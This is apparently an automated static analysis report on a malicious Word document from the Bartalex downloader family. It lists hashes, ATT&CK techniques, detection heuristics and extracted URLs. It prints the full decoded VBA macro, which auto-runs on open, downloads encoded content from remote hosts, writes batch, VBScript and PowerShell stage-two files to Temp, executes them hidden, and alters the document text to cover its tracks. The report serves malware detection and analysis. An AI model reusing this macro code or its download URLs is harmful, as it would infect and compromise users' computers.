Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5c1c853564770056…

MALICIOUS

Office (OLE)

47.5 KB Created: 2015-04-20 05:12:00 Authoring application: Microsoft Office Word First seen: 2015-05-07
MD5: e36843e84e947921f997af5b696edb07 SHA-1: 2133692d9219d2e16ff2528753158a646ba9f959 SHA-256: 5c1c8535647700565131dbde6e495900342f7f51373000713f227d6c89e15376
354 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1071.001 Web Protocols

The sample contains VBA macros that utilize CreateObject and Shell calls, indicative of malicious intent. The script attempts to download content from multiple URLs, including http://bozorg-roshan.com/1623782.txt, and assemble potential executable or script filenames. This behavior strongly suggests the document acts as a downloader for a second-stage payload.

Heuristics 13

  • ClamAV: Doc.Downloader.Bartalex-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Bartalex-1
  • VBA macros detected medium 9 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell(b, 0)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        CreateObject("MSXML2.ServerXMLHTTP")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Quick = GetObject(a)
  • Payload URL assembled from a Chr()/Asc() string expression (3 URLs) high OLE_VBA_EXPR_DROPPER_URL
    A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Environ(a)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://bozorg-roshan.com/lns.txt In document text (OLE body)
    • http://aydinbanyoekipmanlari.com/lns.txtIn document text (OLE body)
    • http://bozorg-roshan.com/1623782.txtReferenced by macro
    • http://aydinbanyoekipmanlari.com/1623782.txtIn document text (OLE body)
    • http://bozorg-roshan.com/1623782.txt123123123Referenced by macro
    • http://savepic.su/5633401.pngReferenced by macro
    • http://savepic.su/5623161.pngReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7604 bytes
SHA-256: 294001fb565b3c181fe3fac872a2f533779d41748a90dd1c8d9119619d356534
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
    ahuswhuiqwhdebghv
End Sub
Sub ahuswhuiqwhdebghv()
    Dim huwe, auwd As Integer
    Dim retVal As Variant
    HUWQD = Module3.Juwqdhwt(20000)
    FL2 = "" & HUWQD
    HPPSDJ = "Temp"
    PH2 = Module3.Bad("" & HPPSDJ) + "\"
    NDUWGD = "461237618273612"
    
    HYWDAX = "baaslkdjklwqdjkqwhdjqhwjkdqt"
    JWIDJIAAA = Chr(97 + Sgn(5)) + "a"
    HUYFEA = JWIDJIAAA + Right(HYWDAX, 1)
    WKDOQ = NDUWGD
    PSFL = FL2 + "" & "." + "p" + "" + Chr(Asc("s")) _
    + _
    "1"
    VBFL = FL2 + Chr(50 - 4) + "v" + "b" & "" & "s" & ""
    huwe = 1
    BAFL = FL2 + Chr(Sgn(Fix(-22.043)) + 11 + 10 + 25 + huwe + 0) + HUYFEA
    
    INTG = "o" & "bject"
    AFTG = "m" & "odule"
    
    SXE = "" & Chr(Asc(".")) & Chr(101) & "xe" & ""
    GNG = ".png"
    
    PHT = "" & "htt" & "p://" & ""
    SPIC = PHT + "sav" & "epic.su/"
     
    PSPTH = PH2 + PSFL
    VBPTH = PH2 + VBFL
    BAPTH = PH2 + BAFL

    DRT = FreeFile
    BFT = FreeFile
    CFT = FreeFile
    DFT = FreeFile
    EFT = FreeFile
    
    PBIN = "http://bozorg-roshan.com/1623782.txt"
    
    Dim obg, obg4 As Object
    Dim asdwq As String
    Set obg = _
    CreateObject("MSXML2.ServerXMLHTTP")
    obg.Open "GET", PBIN
    obg.Send ""
    CONT = obg.ResponseText
    asdwq = CONT
    
     HQUWDAAA = "0"
    If (asdwq = "") Then
        PBIN = "http://aydinbanyoekipmanlari.com/1623782.txt"
        Set obg4 = _
        CreateObject("MSXML2.ServerXMLHTTP")
        obg4.Open "GET", PBIN
        obg4.Send ""
        CONT = obg.ResponseText
        asdwq = CONT
        HQUWDAAA = "1"
    End If
    
    CONT = Module3.Decode(asdwq)
    
    TVT10 = Module3.Tort(CONT, "text10")
    TVT20 = Module3.Tort(CONT, "text20")
    TVT21 = Module3.Tort(CONT, "text21")
    TVT30 = Module3.Tort(CONT, "text30")
    TVT31 = Module3.Tort(CONT, "text31")
    XPT1 = Module3.Tort(CONT, "stext1")
    XPT2 = Module3.Tort(CONT, "stext2")
    XPT3 = Module3.Tort(CONT, "stext3")
    
    WVR = Module3.Bad("USE" & "RPROFILE")
    post1 = InStr(WVR, "sers\")
    
    Dim hudhw As Integer
    Dim ghdAdd(1 To 3)
    ghdAdd(1) = "1"
    ghdAdd(2) = "0"
    ghdAdd(3) = "0"
    
    If (post1 <> 0) Then
        ghdAdd(1) = "2"
    Else
        ghdAdd(2) = "3"
    End If
    
    JHWQUD = Join(ghdAdd)
    hudhw = Val(JHWQUD)
    
    Module3.WaitFor (1)
    
    
     Dim obg2 As Object
    Set obg2 = _
    CreateObject("MSXML2.ServerXMLHTTP")
    MIWDWQ = "http://bozorg-roshan.com/lns.txt"
    If (HQUWDAAA = "1") Then
        MIWDWQ = "http://aydinbanyoekipmanlari.com/lns.txt"
    End If
    obg2.Open "GET", MIWDWQ
    obg2.Send ""
    SEXX = obg2.ResponseText
    
    PSTB = PBIN + "123123123"
    STAR1 = SPIC + "5633401" + GNG
    STAR2 = SPIC + "5623161" + GNG
    FFQ = "8"
    FF = FFQ + SXE
    
    
     If (hudhw = 130) Then
     Open BAPTH For Output As #DRT
     Print #DRT, XPT1
     Print #DRT, "set trfd=" + Chr(34) + PH2 + Chr(34)
     Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
     Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
     Print #DRT, XPT2
     Close #DRT
     
     Module3.WaitFor (1)
     
     Open VBPTH For Output As #BFT
     Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
     Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
     Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
     Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
     Print #BFT, XPT3
     Close #BFT
     
     Module3.WaitFor (1)
     NTH1 = Module3.Freat(retVal, BAPTH)
     
     End If
    
    
     If (hudhw = 200) Then
     Open PSPTH For Output As #CFT
     Print #CFT, "$aisjd = '123';"
     Print #CFT, "$asaisjd = '34123';"
     Print #CFT, "$stat = '" + STAR2 + "';"
     Print #CFT, "$ggtt  = '" + SEXX + "';"
     Print #CFT, "$pths = '" + PH2 + "';"
     Print #CFT, "$wehs = '" + FL2 + "';"
     Print #CFT, "$nnm = '" + FFQ + "';"
     Print #CFT, TVT10
     Close #CFT
     
     Open VBPTH For Output As #DFT
     Print #DFT, TVT30
     Print #DFT, "currentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&djwq"
     Print #DFT, TVT31
     Close #DFT
    
     Open BAPTH For Output As #EFT
     Print #EFT, "@echo off"
     Print #EFT, TVT20
     Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
     Print #EFT, "set Gds4=" + Chr(34) + PH2 + Chr(34) + "%Ads3%"
     Print #EFT, TVT21
     Close #EFT
     Module3.WaitFor (1)
    
     NTH2 = Module3.Freat(retVal, BAPTH)
     
     End If
    
    JUW = Chr(47)
    AKK = Chr(60)
    ZKK = ">"
    NTH3 = Module5.Nybdqwd(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
    NTH4 = Module5.Nybdqwd(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
    NTH5 = Module5.Nybdqwd(AKK + INTG + ZKK, "", 3)
    NTH6 = Module5.Nybdqwd(AKK + JUW + INTG + ZKK, "", 3)
    NTH7 = Module5.Nybdqwd(AKK + AFTG + ZKK, "", 3)
    NTH8 = Module5.Nybdqwd(AKK + JUW + AFTG + ZKK, "", 3)

End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub


Attribute VB_Name = "Module3"

Public Function Juwqdhwt(a As Integer)
Juwqdhwt = CStr(Int((a * Rnd) + 10000))
End Function

Sub WaitFor(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds
Do While Timer < SngSec
DoEvents
Loop
End Sub
Public Function Freat(a As Variant, b)
a = _
Shell(b, 0)
Freat = a
End Function

Public Function Tort(a, b As String)
Dim krd, lent As Integer
krd = InStr(1, a, "<" + b + ">") + 8
lent = InStr(1, a, "<" + "/" + b + ">") - krd
KLMN = Mid(a, krd, lent)
AUHWUD = KLMN
Tort = AUHWUD
End Function
Public Function Dtgt(a As String)
Quick = GetObject(a)
End Function

Public Function Quick(a As String)
Quick = GetObject(a)
End Function

Public Function Bad(a As String)
Bad = _
Environ(a)
End Function


Public Function Decode(ByVal strData As String) As String
    Dim objXML As Object
    Dim objNode As Object
    Set objXML = CreateObject("MSXML2.DOMDocument")
    Set objNode = objXML.createElement("b64")
    objNode.DataType = "bin.base64"
    objNode.Text = strData
    WUDHA = objNode.nodeTypedValue
    Decode = WUDHA
    Set objNode = Nothing
    Set objXML = Nothing
End Function




Attribute VB_Name = "Module5"

Public Function Nybdqwd(a As String, b As String, c As Integer)
Dim selectedText As String
Dim hhhg, selRange As Range
Set hhhg = ActiveDocument.Range
With hhhg.Find
.Text = a
.MatchWholeWord = True
hhhg.Find.Execute
hhhg.Collapse direction:=wdCollapseEnd
NYQDIAYGDH = "jk h32h 4hg32j4f 23f4 hg2f3h4j32f43 21ghh21fj 3g1"
Set selRange = ActiveDocument.Range
QUDHDHGJDWK = "h21 kj3hkj12g3 hj12g3jh1f2 3ghf12 3jh12g3f 12hf3"
selRange.Start = hhhg.End
.Text = b
.MatchWholeWord = True
.Execute
hhhg.Collapse direction:=wdCollapseStart
selRange.End = hhhg.Start
If (c = 1) Then
    selectedText = selRange.Delete
End If
If (c = 2) Then
    selRange.Font.Color = wdColorBlack
End If
If (c = 3) Then
    With hhhg.Find
    .Text = a
    .Replacement.Text = Chr(30 + 2)
    .Wrap = wdFindContinue
    .Execute Replace:=wdReplaceAll
    End With
End If

End With
End Function